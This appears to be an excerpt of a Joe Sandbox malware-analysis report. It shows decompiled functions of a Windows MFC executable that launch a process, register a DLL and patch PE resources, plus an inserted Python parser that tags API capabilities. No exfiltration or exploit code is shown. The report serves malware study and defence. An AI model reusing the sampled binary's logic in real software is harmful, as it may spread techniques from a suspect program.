    • __EH_prolog.LIBCMT ref: 00427AD6
      • Part of subcall function 0042A660: GetModuleFileNameA.KERNEL32(00000000,?,00000103,?,00000000,?,00419205,?,00000005,00000000), ref: 0042A66F
      • Part of subcall function 0042A660: lstrlenA.KERNEL32(?,?,00000000,?,00419205,?,00000005,00000000), ref: 0042A67C
      • Part of subcall function 0042A660: lstrlenA.KERNEL32(?,00000000,?,00419205,?,00000005,00000000), ref: 0042A68B
      • Part of subcall function 0042A660: lstrcatA.KERNEL32(?,?,00000000,?,00419205,?,00000005,00000000), ref: 0042A6A0
    • #537.MFC42(?), ref: 00427B00
    • #924.MFC42(?,00000000,00454CC4,?), ref: 00427B12
    • #800.MFC42(?,00000000,00454CC4,?), ref: 00427B1E
    • memset.MSVCRT ref: 00427B2A
    • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,00000000,00454CC4,?), ref: 00427B4B
    • #800.MFC42 ref: 00427B5F
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp
    • Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: #800lstrlen$#537#924CreateFileH_prologModuleNameProcesslstrcatmemset
    • String ID: D$-D
    • API String ID: 188053718-3265099219
    • Opcode ID: ab16a09673d85046ecfb18f85d8818620d30168adb8cbf54d4a41f7c9eeec40d
    • Instruction ID: ddce2532d2edbd1f10bf0b2a166f424bc540c65713c09e694a42de7bf5785289
    • Opcode Fuzzy Hash: ab16a09673d85046ecfb18f85d8818620d30168adb8cbf54d4a41f7c9eeec40d
    • Instruction Fuzzy Hash: 7F117CB1D01228AADB20EBA1DD4AFDFBB7CAF19348F00015AB515A7180E7785608CAA4
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 37%
    			E00426D6B(void* __eflags, intOrPtr _a4) {
    				char _v264;
    				_Unknown_base(*)()* _t9;
    				void* _t10;
    				_Unknown_base(*)()* _t12;
    				struct HINSTANCE__* _t15;
    
    				E0042A660( &_v264, 3, 0);
    				_t15 = LoadLibraryA( &_v264);
    				if(_t15 == 0) {
    					L5:
    					return 0;
    				}
    				__imp__CoInitialize(0);
    				if(_a4 == 0) {
    					_t9 = GetProcAddress(_t15, "DllUnregisterServer");
    					if(_t9 != 0) {
    						 *_t9();
    					}
    					_t10 = 1;
    					return _t10;
    				}
    				_t12 = GetProcAddress(_t15, "DllRegisterServer");
    				if(_t12 != 0) {
    					 *_t12();
    				}
    				FreeLibrary(_t15);
    				__imp__CoFreeUnusedLibraries();
    				__imp__CoUninitialize();
    				goto L5;
    			}








    Instruction addresses (one per decompiled statement above): 0x00426d80, 0x00426d95, 0x00426d99, 0x00426dce, 0x00000000, 0x00426dce, 0x00426d9d, 0x00426da7, 0x00426ddb, 0x00426de3, 0x00426de5, 0x00426de5, 0x00426de9, 0x00000000, 0x00426de9, 0x00426daf, 0x00426db7, 0x00426db9, 0x00426db9, 0x00426dbc, 0x00426dc2, 0x00426dc8, 0x00000000

    APIs
      • Part of subcall function 0042A660: GetModuleFileNameA.KERNEL32(00000000,?,00000103,?,00000000,?,00419205,?,00000005,00000000), ref: 0042A66F
      • Part of subcall function 0042A660: lstrlenA.KERNEL32(?,?,00000000,?,00419205,?,00000005,00000000), ref: 0042A67C
      • Part of subcall function 0042A660: lstrlenA.KERNEL32(?,00000000,?,00419205,?,00000005,00000000), ref: 0042A68B
      • Part of subcall function 0042A660: lstrcatA.KERNEL32(?,?,00000000,?,00419205,?,00000005,00000000), ref: 0042A6A0
    • LoadLibraryA.KERNEL32(?), ref: 00426D8F
    • CoInitialize.OLE32(00000000), ref: 00426D9D
    • GetProcAddress.KERNEL32(00000000,DllRegisterServer), ref: 00426DAF
    • FreeLibrary.KERNEL32(00000000), ref: 00426DBC
    • CoFreeUnusedLibraries.OLE32 ref: 00426DC2
    • CoUninitialize.OLE32 ref: 00426DC8
    • GetProcAddress.KERNEL32(00000000,DllUnregisterServer), ref: 00426DDB
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp
    • Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: AddressFreeLibraryProclstrlen$FileInitializeLibrariesLoadModuleNameUninitializeUnusedlstrcat
    • String ID: DllRegisterServer$DllUnregisterServer
    • API String ID: 3512499333-2931954178
    • Opcode ID: 40e153b43624e0da37c66a28ff56e30f897e653333b082af74b7c8fb72283976
    • Instruction ID: a7167bb22e29533f7d34f5b3ce43aed0af18d597626619e511e2975e1d6da5d4
    • Opcode Fuzzy Hash: 40e153b43624e0da37c66a28ff56e30f897e653333b082af74b7c8fb72283976
    • Instruction Fuzzy Hash: 22F0A4757506286BD3116FB1BC0EB9A366C9F91756F420031F902E6190DBB88A84C6AD
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0041C67B(intOrPtr* __ecx) {
    				struct HINSTANCE__* _t15;
    				intOrPtr* _t24;
    
    				_t24 = __ecx;
    				 *__ecx = 0;
    				 *((intOrPtr*)(__ecx + 4)) = 0;
    				 *((intOrPtr*)(__ecx + 8)) = 0;
    				 *((short*)(__ecx + 0xc)) = 0x419;
    				 *((intOrPtr*)(__ecx + 0x10)) = 0;
    				 *((intOrPtr*)(__ecx + 0x14)) = 0;
    				 *((intOrPtr*)(__ecx + 0x18)) = 0;
    				L0043DDD8();
    				 *((intOrPtr*)(__ecx + 0x24)) = 0;
    				_t15 = LoadLibraryA("KERNEL32.DLL");
    				 *(_t24 + 8) = _t15;
    				if(_t15 != 0) {
    					 *((intOrPtr*)(_t24 + 0x10)) = GetProcAddress(_t15, "BeginUpdateResourceA");
    					 *((intOrPtr*)(_t24 + 0x18)) = GetProcAddress( *(_t24 + 8), "EndUpdateResourceA");
    					 *((intOrPtr*)(_t24 + 0x14)) = GetProcAddress( *(_t24 + 8), "UpdateResourceA");
    				}
    				return _t24;
    			}





    Instruction addresses (one per decompiled statement above): 0x0041c67c, 0x0041c684, 0x0041c686, 0x0041c689, 0x0041c68c, 0x0041c692, 0x0041c695, 0x0041c698, 0x0041c69b, 0x0041c6a5, 0x0041c6a8, 0x0041c6b0, 0x0041c6b3, 0x0041c6c8, 0x0041c6d5, 0x0041c6dd, 0x0041c6dd, 0x0041c6e4

    APIs
    • #540.MFC42(?,?,0041C61B), ref: 0041C69B
    • LoadLibraryA.KERNEL32(KERNEL32.DLL,?,?,0041C61B), ref: 0041C6A8
    • GetProcAddress.KERNEL32(00000000,BeginUpdateResourceA), ref: 0041C6C1
    • GetProcAddress.KERNEL32(?,EndUpdateResourceA), ref: 0041C6CE
    • GetProcAddress.KERNEL32(?,UpdateResourceA), ref: 0041C6DB
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp
    • Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: AddressProc$#540LibraryLoad
    • String ID: BeginUpdateResourceA$EndUpdateResourceA$KERNEL32.DLL$UpdateResourceA
    • API String ID: 1020995900-339194613
    • Opcode ID: f1a27755b19c0f7fc21b24e88ca79110459ea58574f41d5bc01a83055e454a45
    • Instruction ID: 27f285e7a3129734e9f490c22c25d06d0a5874f884a0a5284f684dc97de8e30d
    • Opcode Fuzzy Hash: f1a27755b19c0f7fc21b24e88ca79110459ea58574f41d5bc01a83055e454a45
    • Instruction Fuzzy Hash: AA011DB4500B009F83309F27E845517FBF4EFE5705311491FD496C7A61D7B4A589CB94
    Uniqueness

    Uniqueness Score: -1.00%
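The "APIs" listings attached to E00427AD1, E00426D6B and E0041C67B above share one fixed line format, and the facts worth extracting from them are structured: which imports a function calls directly, which it reaches through a subcall, and, for GetProcAddress, which export names (DllRegisterServer, DllUnregisterServer, BeginUpdateResourceA, EndUpdateResourceA, UpdateResourceA) are resolved at run time and therefore never appear in the PE import table. The script below is an added example written for this page; it is not part of the Joe Sandbox report or of the Joe Sandbox IDA plugin. It parses that listing format and tags capabilities per function. The sample listing is constructed from lines copied from the blocks above, and the CAPABILITY_TAGS table is this example's own assumption, not a sandbox signature.

```python
"""Parser for the 'APIs' listing attached to each decompiled function block.

Added example for this page, not part of the Joe Sandbox report or of the
Joe Sandbox IDA plugin.  It expects the bullet format shown above:
    • Api.Module(arg,arg,...), ref: ADDR
      • Part of subcall function ADDR: Api.Module(...), ref: ADDR
CAPABILITY_TAGS is this example's own assumption, not a sandbox signature.
"""
from __future__ import annotations

import re
from dataclasses import dataclass
from typing import List, Optional

# One bullet line.  MFC imports are listed as ordinals ("#537"), Win32 imports
# by name; the argument list is optional, and the comma before "ref:" only
# appears when arguments are listed (compare CoFreeUnusedLibraries.OLE32).
LINE_RE = re.compile(
    r"^\s*•\s*"
    r"(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>#?\w+)\.(?P<mod>\w+)"
    r"(?:\((?P<args>[^)]*)\))?"
    r",?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)
HEX_RE = re.compile(r"[0-9A-Fa-f]{8}")      # argument printed as a literal
IDENT_RE = re.compile(r"[A-Za-z_]\w*")      # argument printed as a symbol


@dataclass
class ApiCall:
    api: str                       # "CreateProcessA" or MFC ordinal "#537"
    module: str                    # "KERNEL32", "MFC42", "OLE32", ...
    args: List[str]                # argument column as printed
    ref: int                       # address of the call instruction
    subcall: Optional[int] = None  # callee address when reported indirectly


def parse_api_listing(text: str) -> List[ApiCall]:
    """Return one ApiCall per parseable bullet line, in listing order."""
    calls: List[ApiCall] = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # section headers and anything not in the format
        raw = m["args"]
        calls.append(ApiCall(
            api=m["api"], module=m["mod"],
            args=[a.strip() for a in raw.split(",")] if raw else [],
            ref=int(m["ref"], 16),
            subcall=int(m["sub"], 16) if m["sub"] else None))
    return calls


def resolved_names(calls: List[ApiCall]) -> List[str]:
    """Export names handed to GetProcAddress: imports resolved at run time,
    which never appear in the PE import table."""
    names = []
    for c in calls:
        if c.api == "GetProcAddress" and len(c.args) >= 2:
            name = c.args[1]
            if IDENT_RE.fullmatch(name) and not HEX_RE.fullmatch(name):
                names.append(name)
    return names


# Assumption: a minimal mapping picked for this example.
CAPABILITY_TAGS = {
    "CreateProcessA": "process-creation",
    "LoadLibraryA": "dynamic-api-resolution",
    "GetProcAddress": "dynamic-api-resolution",
    "DllRegisterServer": "com-server-registration",
    "DllUnregisterServer": "com-server-registration",
    "BeginUpdateResourceA": "pe-resource-modification",
    "UpdateResourceA": "pe-resource-modification",
    "EndUpdateResourceA": "pe-resource-modification",
    "SHBrowseForFolderA": "folder-picker-dialog",
    "GetModuleFileNameA": "self-path-lookup",
}


def capabilities(calls: List[ApiCall]) -> List[str]:
    """Sorted tags over direct calls, subcalls and run-time-resolved names."""
    names = {c.api for c in calls} | set(resolved_names(calls))
    return sorted({CAPABILITY_TAGS[n] for n in names if n in CAPABILITY_TAGS})


# Constructed input: lines copied from the listings of E00427AD1, E00426D6B
# and E0041C67B on this page.
SAMPLE_LISTING = """\
• __EH_prolog.LIBCMT ref: 00427AD6
  • Part of subcall function 0042A660: GetModuleFileNameA.KERNEL32(00000000,?,00000103,?,00000000,?,00419205,?,00000005,00000000), ref: 0042A66F
• #537.MFC42(?), ref: 00427B00
• CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,00000000,00454CC4,?), ref: 00427B4B
• LoadLibraryA.KERNEL32(?), ref: 00426D8F
• GetProcAddress.KERNEL32(00000000,DllRegisterServer), ref: 00426DAF
• CoFreeUnusedLibraries.OLE32 ref: 00426DC2
• GetProcAddress.KERNEL32(?,EndUpdateResourceA), ref: 0041C6CE
"""

if __name__ == "__main__":
    parsed = parse_api_listing(SAMPLE_LISTING)
    for c in parsed:
        via = f"(via {c.subcall:08X}) " if c.subcall else ""
        print(f"{c.ref:08X} {via}{c.api}.{c.module} {c.args}")
    print("resolved at run time:", resolved_names(parsed))
    print("capabilities:", capabilities(parsed))
```

Fed the text of a whole report, it yields a per-function capability summary; lines that do not match the format (the "APIs" and "Strings" headers, the memory-dump lines) are skipped rather than raised. The second argument of GetProcAddress is the part a static import scan misses, which is why it is folded into the capability set alongside the directly imported names.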

    C-Code - Quality: 54%
    			E004034B3(intOrPtr* __ecx) {
    				intOrPtr _t92;
    				void* _t110;
    				intOrPtr* _t111;
    				void* _t149;
    				intOrPtr* _t150;
    				void* _t152;
    				intOrPtr* _t153;
    				intOrPtr _t154;
    				void* _t156;
    				void* _t158;
    
    				E0043E4E0(E0043EE96, _t156);
    				_t111 = __ecx;
    				 *((intOrPtr*)(_t156 - 0x10)) = _t158 - 0x310;
    				L0043DD4E();
    				_t153 =  *((intOrPtr*)(_t156 + 8));
    				 *(_t156 - 4) =  *(_t156 - 4) & 0x00000000;
    				 *(_t156 - 4) = 1;
    				 *((intOrPtr*)( *_t153 + 0x34))(_t152, _t110);
    				_t150 =  *((intOrPtr*)(_t156 + 0xc));
    				 *((intOrPtr*)( *_t150 + 0x40))();
    				 *(_t156 - 4) =  *(_t156 - 4) | 0xffffffff;
    				L0043DD48();
    				L0043DD4E();
    				 *(_t156 - 4) = 4;
    				 *(_t156 - 4) = 5;
    				L0043DE38();
    				 *((intOrPtr*)(_t156 - 0x198)) = __ecx;
    				E00403209(_t156 - 0x31c);
    				 *((intOrPtr*)(_t156 - 0x198)) = _t156 - 0x31c;
    				L0042D1F0(_t156 - 0x198, _t156 - 0x198, _t156 - 0x198, 0x1001, 0x20, _t149);
    				 *((intOrPtr*)(_t156 - 0x174)) = 2;
    				L0042D530(_t156 - 0x198);
    				 *((intOrPtr*)( *_t111 + 0x2c))(_t156 - 0x198);
    				 *((intOrPtr*)( *_t153 + 0x2c))();
    				 *((intOrPtr*)( *_t153 + 0x14))();
    				L0042D700(_t156 - 0x198, _t156 - 0x198, _t156 - 0x198, _t156 - 0x198, _t156 - 0x198, 0);
    				 *((intOrPtr*)( *_t111 + 0x2c))(_t156 - 0x198, 1);
    				 *((intOrPtr*)( *_t150 + 0x14))(_t156 - 0x198, 1);
    				 *((intOrPtr*)( *_t150 + 0x18))(_t156 - 0x198);
    				while(1) {
    					_t92 =  *_t153;
    					_push(_t156 - 0x198);
    					if( *((intOrPtr*)(_t156 - 0xc0)) >=  *((intOrPtr*)(_t156 - 0x17c))) {
    						break;
    					}
    					 *((intOrPtr*)( *_t150 + 0x20))(_t156 - 0x198,  *((intOrPtr*)(_t153 + 0xc)),  *((intOrPtr*)(_t92 + 0x1c))());
    				}
    				 *((intOrPtr*)(_t92 + 0x18))();
    				 *((intOrPtr*)( *_t150 + 0x1c))(_t156 - 0x198);
    				L0042D260(_t156 - 0x198);
    				 *(_t156 - 4) =  *(_t156 - 4) | 0xffffffff;
    				L0043DD48();
    				L0043DE2C();
    				L0043DD4E();
    				 *(_t156 - 4) = 7;
    				 *(_t156 - 4) = 8;
    				 *((intOrPtr*)( *_t153 + 0x3c))(_t156 - 0x198, _t156 - 0x198);
    				 *((intOrPtr*)( *_t150 + 0x48))();
    				 *(_t156 - 4) =  *(_t156 - 4) | 0xffffffff;
    				L0043DD48();
    				E0040378A(_t111, _t156 - 0x14);
    				_t154 = 0;
    				if( *((intOrPtr*)( *((intOrPtr*)(_t156 - 0x14)) - 8)) != 0) {
    					_t154 = 2;
    				}
    				 *(_t156 - 4) =  *(_t156 - 4) | 0xffffffff;
    				L0043DD36();
    				 *[fs:0x0] =  *((intOrPtr*)(_t156 - 0xc));
    				return _t154;
    			}













    Instruction addresses (one per decompiled statement above): 0x004034b8, 0x004034c5, 0x004034cb, 0x004034ce, 0x004034d3, 0x004034d6, 0x004034e0, 0x004034e4, 0x004034e7, 0x004034f3, 0x004034f6, 0x004034fa, 0x00403502, 0x0040350d, 0x0040351a, 0x0040351e, 0x00403523, 0x0040352e, 0x00403539, 0x00403546, 0x00403551, 0x0040355c, 0x00403570, 0x0040357e, 0x0040358c, 0x00403596, 0x004035a9, 0x004035b9, 0x004035c7, 0x004035ca, 0x004035dc, 0x004035de, 0x004035e1, 0x00000000, 0x00000000, 0x004035f5, 0x004035f5, 0x004035fa, 0x00403608, 0x00403612, 0x00403617, 0x0040361c, 0x0040362d, 0x00403635, 0x0040363c, 0x00403645, 0x00403649, 0x00403650, 0x00403653, 0x00403657, 0x00403662, 0x0040366a, 0x0040366f, 0x00403671, 0x00403671, 0x00403675, 0x0040367c, 0x00403689, 0x00403692

    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp
    • Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: #1567#268$#5628#800#909H_prolog
    • String ID:
    • API String ID: 2151629037-0
    • Opcode ID: b0b430a165b619de49a252735c073abdae3da5fd9b9f66aa43febc90b88111ea
    • Instruction ID: 268a258aaf44dd5b462995fc4df9fcd22a292b37963de6475e019a9a91cb9d6c
    • Opcode Fuzzy Hash: b0b430a165b619de49a252735c073abdae3da5fd9b9f66aa43febc90b88111ea
    • Instruction Fuzzy Hash: 3E518C71A10118DFCB28DF64D899AEDB7B8AF48314F20419EF51AA7291DF389E84CF54
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 43%
    			E0041BB74(void* __ecx, void* __eflags) {
    				intOrPtr _t28;
    				void* _t54;
    				void* _t77;
    				intOrPtr _t78;
    
    				_t77 = __ecx;
    				_t28 =  *((intOrPtr*)(__ecx + 0x60));
    				 *((intOrPtr*)(__ecx + 0x178)) =  *((intOrPtr*)(_t28 + 0x66c));
    				 *((intOrPtr*)(__ecx + 0x17c)) =  *((intOrPtr*)(_t28 + 0x670));
    				 *((intOrPtr*)(__ecx + 0x180)) =  *((intOrPtr*)(_t28 + 0x674));
    				L0043DF94();
    				_push( *( *((intOrPtr*)(__ecx + 0x60)) + 0x360) & 0x000000ff);
    				_push(0x46a);
    				L0043DF82();
    				_push( *( *((intOrPtr*)(__ecx + 0x60)) + 0x362) & 0x000000ff);
    				_push(0x46d);
    				L0043DF82();
    				_push( *( *((intOrPtr*)(__ecx + 0x60)) + 0x365) & 0x000000ff);
    				_push(0x46e);
    				L0043DF82();
    				_push( *( *((intOrPtr*)(__ecx + 0x60)) + 0x364) & 0x000000ff);
    				_push(0x46f);
    				L0043DF82();
    				_push( *( *((intOrPtr*)(__ecx + 0x60)) + 0x366) & 0x000000ff);
    				_push(0x470);
    				L0043DF82();
    				_push( *( *((intOrPtr*)(__ecx + 0x60)) + 0x367) & 0x000000ff);
    				_push(0x473);
    				L0043DF82();
    				_push( *( *((intOrPtr*)(__ecx + 0x60)) + 0x363) & 0x000000ff);
    				_push(0x474);
    				L0043DF82();
    				_push( *( *((intOrPtr*)(__ecx + 0x60)) + 0x14f) & 0x000000ff);
    				_push(0x497);
    				L0043DF82();
    				asm("sbb ecx, ecx");
    				_push( ~( *( *((intOrPtr*)(__ecx + 0x60)) + 0x140)) + 0x47d);
    				_push(0x47d);
    				_push(0x47c);
    				L0043E072();
    				E0041BE8F(E0041BE71(E0041BEC8(0x47d, __ecx), _t77), _t77);
    				_t76 = _t77 + 0x64;
    				E0040CF63(_t77 + 0x64, 0x323232, 1);
    				if(_t77 != 0) {
    					_t78 =  *((intOrPtr*)(_t77 + 0x20));
    				} else {
    					_t78 = 0;
    				}
    				E0040CF2E(_t76, 1, 0x4550cc, 0, 0, 0, 0x5a2, _t78);
    				_t54 = 1;
    				return _t54;
    			}







    Instruction addresses (one per decompiled statement above): 0x0041bb75, 0x0041bb78, 0x0041bb81, 0x0041bb8d, 0x0041bb9b, 0x0041bba1, 0x0041bbb2, 0x0041bbb3, 0x0041bbb8, 0x0041bbc9, 0x0041bbca, 0x0041bbcf, 0x0041bbe0, 0x0041bbe1, 0x0041bbe6, 0x0041bbf7, 0x0041bbf8, 0x0041bbfd, 0x0041bc0e, 0x0041bc0f, 0x0041bc14, 0x0041bc25, 0x0041bc26, 0x0041bc2b, 0x0041bc3c, 0x0041bc3d, 0x0041bc42, 0x0041bc53, 0x0041bc54, 0x0041bc59, 0x0041bc6e, 0x0041bc72, 0x0041bc73, 0x0041bc74, 0x0041bc7b, 0x0041bc90, 0x0041bc95, 0x0041bca1, 0x0041bcaa, 0x0041bcb0, 0x0041bcac, 0x0041bcac, 0x0041bcac, 0x0041bcc5, 0x0041bccc, 0x0041bccf

    APIs
    • #4710.MFC42 ref: 0041BBA1
    • #1779.MFC42(0000046A,?), ref: 0041BBB8
    • #1779.MFC42(0000046D,?,0000046A,?), ref: 0041BBCF
    • #1779.MFC42(0000046E,?,0000046D,?,0000046A,?), ref: 0041BBE6
    • #1779.MFC42(0000046F,?,0000046E,?,0000046D,?,0000046A,?), ref: 0041BBFD
    • #1779.MFC42(00000470,?,0000046F,?,0000046E,?,0000046D,?,0000046A,?), ref: 0041BC14
    • #1779.MFC42(00000473,?,00000470,?,0000046F,?,0000046E,?,0000046D,?,0000046A,?), ref: 0041BC2B
    • #1779.MFC42(00000474,?,00000473,?,00000470,?,0000046F,?,0000046E,?,0000046D,?,0000046A,?), ref: 0041BC42
    • #1779.MFC42(00000497,?,00000474,?,00000473,?,00000470,?,0000046F,?,0000046E,?,0000046D,?,0000046A,?), ref: 0041BC59
    • #1783.MFC42(0000047C,0000047D,?,00000497,?,00000474,?,00000473,?,00000470,?,0000046F,?,0000046E,?,0000046D), ref: 0041BC7B
      • Part of subcall function 0041BEC8: #4055.MFC42(00000473,?,?,0041BC87,0000047C,0000047D,?,00000497,?,00000474,?,00000473,?,00000470,?,0000046F), ref: 0041BED1
      • Part of subcall function 0041BEC8: #3092.MFC42(00000497,00000001,00000473,?,?,0041BC87,0000047C,0000047D,?,00000497,?,00000474,?,00000473,?,00000470), ref: 0041BEE5
      • Part of subcall function 0041BEC8: #2642.MFC42(00000497,00000001,00000473,?,?,0041BC87,0000047C,0000047D,?,00000497,?,00000474,?,00000473,?,00000470), ref: 0041BEEC
      • Part of subcall function 0041BEC8: #3092.MFC42(00000496,00000001,00000497,00000001,00000473,?,?,0041BC87,0000047C,0000047D,?,00000497,?,00000474,?,00000473), ref: 0041BEF9
      • Part of subcall function 0041BEC8: #2642.MFC42(00000496,00000001,00000497,00000001,00000473,?,?,0041BC87,0000047C,0000047D,?,00000497,?,00000474,?,00000473), ref: 0041BF00
      • Part of subcall function 0041BE71: #4055.MFC42(0000046A,?,0041BC8E,0000047C,0000047D,?,00000497,?,00000474,?,00000473,?,00000470,?,0000046F,?), ref: 0041BE79
      • Part of subcall function 0041BE71: EnumChildWindows.USER32 ref: 0041BE87
      • Part of subcall function 0041BE8F: #4055.MFC42(00000470,?,?,0041BC95,0000047C,0000047D,?,00000497,?,00000474,?,00000473,?,00000470,?,0000046F), ref: 0041BE98
      • Part of subcall function 0041BE8F: #4055.MFC42(0000046A,00000470,?,?,0041BC95,0000047C,0000047D,?,00000497,?,00000474,?,00000473,?,00000470,?), ref: 0041BEA6
      • Part of subcall function 0041BE8F: #3092.MFC42(00000472,00000000,0000046A,00000470,?,?,0041BC95,0000047C,0000047D,?,00000497,?,00000474,?,00000473,?), ref: 0041BEB9
      • Part of subcall function 0041BE8F: #2642.MFC42(00000472,00000000,0000046A,00000470,?,?,0041BC95,0000047C,0000047D,?,00000497,?,00000474,?,00000473,?), ref: 0041BEC0
      • Part of subcall function 0040CF63: InvalidateRect.USER32(?,00000000,00000001), ref: 0040CF7B
    Memory Dump Source
    • Source File: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp
